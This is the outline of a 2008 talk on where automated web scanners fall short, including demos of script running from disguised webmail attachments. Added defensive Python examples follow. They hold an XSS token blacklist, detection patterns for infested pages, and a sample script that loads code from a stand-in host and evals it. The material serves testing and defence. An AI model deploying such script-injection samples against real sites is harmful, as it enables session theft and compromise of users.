
Web 2.0 Hacking

Explore the limitations of today's web scanners and see where manual web testing takes over.

Published in: Technology

  1. Web Application Security Assessments: Beyond the Automated Scanners
     Presented by: Blake Turrentine, [email_address]
     Date: August 25, 2008
     Locale: DHS Conference and Workshops, Baltimore, MD
  2. Scanning Web 1.0 Technology
  3. Scanning Today’s Web 2.0 Technology
  4. Mashups and Web Widgets
  5. Beyond the Browser: Desktop Widgets
  6. The Security Process
     - Threat Modeling
     - STRIDE
     - CIGITAL
     - CLASP
     - FISMA/NIST
  7. Types of Testing Techniques
     - Black Box
     - White Box
     - Grey Box
  8. Types of Automated Scanners
     - Static Code Analysis
     - Vulnerability
     - Web Application Specific
     - Fuzzers
     - Web Application Firewalls
  9. Today’s Automated Scanners
     - Fortify Source Code Analyzer
     - Qualys, Nessus, SAINT, FoundScan
     - WebInspect, Cenzic, AppScan, Nikto
     - Mu-4000, Codenomicon, Peach, Spike
     - Web application firewalls:
       - Imperva
       - Fortify
       - ModSecurity
 10. Problems with Automated Scans
     - Putting too much faith in automated scanners
     - Their limitations: intuitiveness
     - Low-hanging fruit
     - False positives and false negatives
     - 508 Compliance / CAPTCHA
     - Out-maneuvering IPS and WAFs
     - Dangers of injecting code in production environments
 11. More Problems With Automated Scans
     - Spidering
     - Complex business logic
     - Complex session handling
     - Semantics
     - Detecting sensitive data
     - Asynchronous dynamic code execution
     - Horizontal and vertical escalation
     - Mashups, Ajax bridges, widgets, RSS feeds
     - Emerging technologies such as AIR and Silverlight
 12. Approaching a Better Solution: Taking a Closer Look
     - Validation of automated scanners
     - Application profiling
     - Examining known attack vectors
     - Looking for compromise
     - Fuzzing
 13. Application Profiling
     - Application fingerprinting
     - COTS
     - The mindset of application developers:
       - Server Side Code Developer
       - Client Side Code Developer
       - System Administrator (SA)
       - Database Administrator (DBA)
 14. Examining Known Vectors
     - Catalog the application, then vulnerability detection
     - The checklist
 15. Client Side: Why scanners have difficulties handling Advanced JavaScript
     - Obfuscation
     - Lazy loading
     - Compromise
     - Browser/server security tradeoffs
 16. Client Side: Why scanners can’t handle Applets
     - Decompiling bytecode (it is not HTML)
     - Complex session management
 17. Server Side: Input/output of content is getting more complex
     - Upload/download of files
     - Effective screening of content/control
     - Open boundary conditions
     - Embedded objects, ActionScript, plug-ins, ActiveX
     - Who’s responsible for the content supplied
     - Blacklists, whitelists, regex, selective lists
 18. Server Side: Scanners’ Lack of Filter Enumeration and Evasion
     - Response analysis
     - Blacklisting
     - Encoding tactics
     - Problems in dealing with Rich Internet Apps (Flash, RSS, widgets)
     - Whitelisting drawbacks: bypassing regex
     - Employ input and output validation with both whitelists and blacklists
     - Good input validation, poor output validation
 19. Complexity of Analysis in Web Services
     - XML parsing, manipulation, appending files, lack of tools
     - AJAX: extended footprint (traditional Web application with Web services)
 20. Difficulties in Testing Application Logic
     - Inter-protocol exploitation and communication
     - Forced directory browsing: access control
     - Backend Web services
     - API reverse engineering
     - Authorization, session management, horizontal and vertical escalation, AJAX
 21. Sophistication in Combining Attack Vectors
     - XSS, SQL, Command, HTML Injection
     - SMTP
     - Browser types, versions and plug-ins, ActiveX
     - Server configurations
     - Interpretation of error handling (database errors, stack traces)
     - Encoding tactics
     - Attacking the Admin
     - Multilayer, 2nd-order attacks, edge cases
 22. Most Scanners Don’t Look for Infestation CSRF
     - Parsing the database
     - Script calls
     - Embedded AJAX
     - RSS
     - Flash
     - CSRF
     - ActiveX calls
     - Outbound calls
     - Botnets
     - Mastering the DOM: polymorphic JavaScript
 23. Infestation Detection
     - Looking for hooking events: onload and onfocus, eval()
     - Looking for user events such as onmouseover
     - Making HTTP connections offsite
     - OnKeyEvent
     - Asynchronous stream injections with dynamic script execution
     - The JavaScript interpreter (Caffeine Monkey, SpiderMonkey): obfuscation, whitespacing
 24. Difficulties in Fuzzing Analysis
     - Pros and cons
     - File fuzzing
     - Fuzzing APIs
     - HTTP server response codes
     - Code paths
 25. Closing Remarks
     - The machine and the human element
     - Machine to machine
     - Code maintenance
     - Preventing your app from becoming part of a botnet
     - SDLC process
     - Regression testing
     - Dealing with 0-day attacks
 26. Demonstration
     - Bypassing Defense in Depth
 27. Webmail Application Test: Combining Server & Client Attack Vectors
 28. Webmail Application Test: IE Recognizes File as HTML
 29. Webmail Application Test: Session Cookie is Displayed
 30. GMail Web Application Test: Screenshot of Attached File
 31. GMail Web Application Test: IE Recognizes File as HTML
 32. GMail Web Application Test: JavaScript Fires
 33. Yahoo Mail Web Application Test: Creating an Email
 34. Yahoo Mail Web Application Test: Contents of ‘Instructions.doc’
 35. Yahoo Mail Web Application Test: Screenshot of Attached File
 36. Yahoo Mail Web Application Test: Norton AV Scans File Before Download
 37. Yahoo Mail Web Application Test: JavaScript Fires
 38. Yahoo Mail Web Application Test: Redirection to Another Site
 39. Questions?
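Slide 18 names regex bypasses, encoding tactics and "good input validation, poor output validation" without showing what they look like in code. The Python below is an added example, not code from the deck or its author: it contrasts three allowlist regex variants a filter author might write, shows a blacklist applied before URL decoding (the wrong order), and pairs a rendering function that trusts the input filter with one that encodes on output regardless of what the filter let through. The sample inputs, the "letters, digits and spaces" rule and the blacklist tokens are constructed for illustration.

```python
import html
import re
import urllib.parse
from typing import Optional

# Constructed sample inputs (not from the slides). The first is what a
# "letters, digits and spaces only" rule is meant to accept; the rest are
# values a tester would feed to the same rule to enumerate its edges.
SAMPLE_INPUTS = ["alice smith", "alice<b>bold</b>", "alice\n", "alice%3Cb%3Ebold"]

ALLOWED = r"[A-Za-z0-9 ]+"


def allowlist_unanchored(value: str) -> bool:
    """Common mistake: re.match anchors only at the start, so any suffix gets through."""
    return re.match(ALLOWED, value) is not None


def allowlist_dollar_anchored(value: str) -> bool:
    """Better, but '$' also matches just before a trailing newline, so 'alice\\n' passes."""
    return re.match("^" + ALLOWED + "$", value) is not None


def allowlist_fullmatch(value: str) -> bool:
    """Correct: the whole value must fit the pattern, with no leading or trailing extras."""
    return re.fullmatch(ALLOWED, value) is not None


# A typical short blacklist (constructed); the point is the order it is applied in.
BLOCKED_TOKENS = ("<script", "javascript:")


def blacklist_then_decode(raw: str) -> Optional[str]:
    """Wrong order: the blacklist sees the encoded form, then the application decodes it."""
    if any(token in raw.lower() for token in BLOCKED_TOKENS):
        return None
    return urllib.parse.unquote(raw)


def decode_then_allowlist(raw: str) -> Optional[str]:
    """Right order: canonicalise first, then apply the allowlist to the value the app will use."""
    decoded = urllib.parse.unquote(raw)
    return decoded if allowlist_fullmatch(decoded) else None


def render_unsafe(name: str) -> str:
    """Relies entirely on the input filter; whenever the filter is wrong, so is the page."""
    return f"<p>Hello, {name}</p>"


def render_safe(name: str) -> str:
    """Output encoding for the HTML text context, independent of what the input filter let in."""
    return f"<p>Hello, {html.escape(name, quote=True)}</p>"


def evaluate(values=SAMPLE_INPUTS) -> dict:
    """Run each sample through the three allowlist variants.

    Returns {value: (unanchored, dollar_anchored, fullmatch)} so the differences
    between the three rules can be read side by side.
    """
    return {
        v: (allowlist_unanchored(v), allowlist_dollar_anchored(v), allowlist_fullmatch(v))
        for v in values
    }


if __name__ == "__main__":
    for value, verdicts in evaluate().items():
        print(repr(value), verdicts)
    print(render_unsafe("alice<b>bold</b>"))
    print(render_safe("alice<b>bold</b>"))
```

The table printed by `evaluate()` is the kind of filter enumeration the slide says scanners lack: the same four inputs expose which anchor the rule uses, and `render_safe` shows why output encoding is applied even when the allowlist is correct.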
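Slide 23 lists indicators of an infested page (event hooks such as onload, onfocus and onmouseover, eval(), offsite HTTP connections, dynamic script execution, obfuscation and whitespace tricks) that scanners tend not to look for. The Python below is an added example, not code from the deck, of a first-pass triage scanner built from that list: it reports which indicators appear in a script so a human can review them. `ALLOWED_HOSTS`, the regular expressions and the three sample scripts are constructed assumptions; the whitespace-ratio heuristic is likewise a constructed rule, not a vendor signature.

```python
import re
from dataclasses import dataclass
from typing import List

# Assumption: hosts the application legitimately loads script from.
ALLOWED_HOSTS = {"www.example.com", "static.example.com"}

# Constructed heuristics following the slide's indicator list.
EVENT_HOOK_RE = re.compile(
    r"\b(onload|onfocus|onmouseover|onkey(?:down|up|press))\s*=", re.IGNORECASE)
LISTENER_RE = re.compile(
    r"addEventListener\s*\(\s*['\"](load|focus|mouseover|key(?:down|up|press))['\"]",
    re.IGNORECASE)
DYNAMIC_EXEC_RE = re.compile(
    r"\beval\s*\(|\bnew\s+Function\s*\(|\bset(?:Timeout|Interval)\s*\(\s*['\"]")
SCRIPT_INJECT_RE = re.compile(
    r"document\.write(?:ln)?\s*\(|createElement\s*\(\s*['\"]script['\"]", re.IGNORECASE)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
OBFUSCATION_RE = re.compile(
    r"String\.fromCharCode|\bunescape\s*\(|(?:\\x[0-9A-Fa-f]{2}){4,}")


@dataclass
class Finding:
    kind: str    # indicator category
    detail: str  # the matched text or host


def scan_script(js: str) -> List[Finding]:
    """Return every indicator found in the script text; an empty list means none."""
    findings: List[Finding] = []
    for m in EVENT_HOOK_RE.finditer(js):
        findings.append(Finding("event-hook", m.group(1).lower()))
    for m in LISTENER_RE.finditer(js):
        findings.append(Finding("event-hook", "on" + m.group(1).lower()))
    for m in DYNAMIC_EXEC_RE.finditer(js):
        findings.append(Finding("dynamic-exec", m.group(0).strip()))
    for m in SCRIPT_INJECT_RE.finditer(js):
        findings.append(Finding("script-injection", m.group(0).strip()))
    for m in URL_HOST_RE.finditer(js):
        host = m.group(1).lower()
        if host not in ALLOWED_HOSTS:
            findings.append(Finding("offsite-host", host))
    for m in OBFUSCATION_RE.finditer(js):
        findings.append(Finding("obfuscation", m.group(0)[:24]))
    # Packed code hiding in one long run: a sizeable body with almost no whitespace.
    if len(js) >= 200:
        ws = sum(ch.isspace() for ch in js) / len(js)
        if ws < 0.02:
            findings.append(Finding("minimal-whitespace", f"{ws:.3%} whitespace"))
    return findings


# Constructed sample scripts (not captured from any real site).
BENIGN = """
// Ordinary page script: nothing hooked, nothing fetched, nothing evaluated.
var box = document.getElementById('status');
box.textContent = 'ready';
"""

SUSPICIOUS = (
    "var s=document.createElement('script');\n"
    "s.src='http://updates.invalid/loader.js';document.body.appendChild(s);\n"
    "document.body.onmouseover=function(){eval(unescape('%2f%2a constructed %2a%2f'));};\n"
    "document.onkeydown=function(e){};\n"
)

# A long run of statements with a single space in it trips the whitespace heuristic.
PACKED = "var a=" + "1;" * 150


if __name__ == "__main__":
    for label, script in (("benign", BENIGN), ("suspicious", SUSPICIOUS), ("packed", PACKED)):
        print(label)
        for f in scan_script(script):
            print(f"  {f.kind}: {f.detail}")
```

Hooks and offsite loads also occur in legitimate code, so the output is a triage list rather than a verdict; the human review the deck argues for starts from findings like these.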

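The demonstration slides 27 to 38 show the same chain three times: an attachment named as a document is handed back by the webmail application, the browser recognises its contents as HTML, its script runs, and the session cookie is exposed. The Python below is an added example, not part of the deck, of what the serving side can do about that chain: a sniff-style check that flags a file whose bytes are markup while its extension says otherwise, and the response headers that instruct the browser to download the file rather than render it. The sample bytes, the marker list and the filename rule are constructed; the OLE header constant is the standard signature of legacy binary `.doc` files.

```python
import re
from typing import Dict

# Tags a browser's content sniffer looks for near the start of a body (simplified,
# constructed list; not any particular browser's algorithm).
HTML_MARKERS = (b"<!doctype", b"<html", b"<script", b"<body", b"<head", b"<iframe", b"<object")

# Compound File (OLE2) header that legacy binary .doc files begin with.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def looks_like_html(data: bytes, window: int = 512) -> bool:
    """True when the leading bytes contain markup a browser would render as HTML."""
    head = data[:window].lstrip().lower()
    return any(marker in head for marker in HTML_MARKERS)


def safe_filename(name: str) -> str:
    """Keep a conservative character set so the name cannot break the header or carry a path."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    cleaned = re.sub(r"[^A-Za-z0-9._-]", "_", base).lstrip(".")
    return cleaned or "attachment"


def attachment_headers(filename: str, data: bytes) -> Dict[str, str]:
    """Headers for returning a user-supplied attachment: force download, forbid sniffing.

    Content-Type is fixed to octet-stream regardless of what the uploader declared,
    Content-Disposition makes it a download, and X-Content-Type-Options stops the
    browser from second-guessing the type; X-Download-Options (IE) removes the
    in-place "Open" option from the download prompt.
    """
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_filename(filename)}"',
        "X-Content-Type-Options": "nosniff",
        "X-Download-Options": "noopen",
        "Content-Length": str(len(data)),
    }


def classify_attachment(filename: str, data: bytes) -> str:
    """Defender's check for the slides' scenario: a '.doc' whose bytes are really markup."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if looks_like_html(data) and ext not in ("html", "htm"):
        return "markup-with-misleading-extension"
    if ext == "doc" and not data.startswith(OLE_MAGIC):
        # Heuristic only: RTF or renamed newer formats also lack the OLE header.
        return "doc-without-ole-header"
    return "ok"


# Constructed samples: a "document" that is actually a page, and a minimal OLE header.
FAKE_DOC = b"  <html><body><p>Instructions</p></body></html>"
REAL_DOC = OLE_MAGIC + b"\x00" * 24


if __name__ == "__main__":
    for name, blob in (("Instructions.doc", FAKE_DOC), ("Instructions.doc", REAL_DOC)):
        print(name, classify_attachment(name, blob))
    for k, v in attachment_headers('../"Instructions".doc', FAKE_DOC).items():
        print(f"{k}: {v}")
```

The classification is a triage signal for the upload or download path; the headers are the part that breaks the demonstrated chain even when classification is wrong. Serving attachments from a separate hostname that carries no session cookie is a further, commonly used layer not shown here.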